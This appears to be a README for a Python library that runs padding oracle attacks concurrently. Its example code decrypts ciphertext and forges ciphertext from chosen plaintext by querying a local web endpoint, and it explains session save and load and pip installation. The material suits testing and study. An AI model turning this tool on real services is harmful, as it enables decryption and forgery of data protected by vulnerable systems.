A library for padding oracle attack concurrently

Payload_model is a abstract class handling all details of padding oracle attack algorithm. You should specify a subclass of payload_model and change some import methods. You can customize it to fit different environment.

Usage

Get clear text from cipher text

from padding_oracle_attack import payload_model
import grequests
from grequests import request

class payload(payload_model):
    def padding_ok(self, resp:Response) -> bool:
        if resp.status_code == 200:
            return True
        else:
            return False

    def recover_fake_data(self, req:Request, fake_datas):
        for fake_data in fake_datas:
            if bytes.hex(fake_data) in req.url:
                return fake_data
        return None

    def make_request(self, fake_data) -> request:
        params = {
                "data": bytes.hex(fake_data)
            }

        return request("get", "http://127.0.0.1:5000", params=params)

if __name__ == "__main__":
    m = payload("3a10f84900818b1c439430600524fb0f00000000000000000000000000000000")
    m.run()

Fake cipher text via clear text

...
# some code same as the former
...
if __name__ == "__main__":
    m = payload("3a10f84900818b", fake=True)
    m.run()

Result

Save and Load session

When breaking down the execution(CTRL-C), it will save session to file 'padding-session.txt' automaticly.You can load session like below.

payload = Payload(bytes.hex(exp), fake=True)
payload.load()
payload.run()

Installation

pip install padding-oracle-attack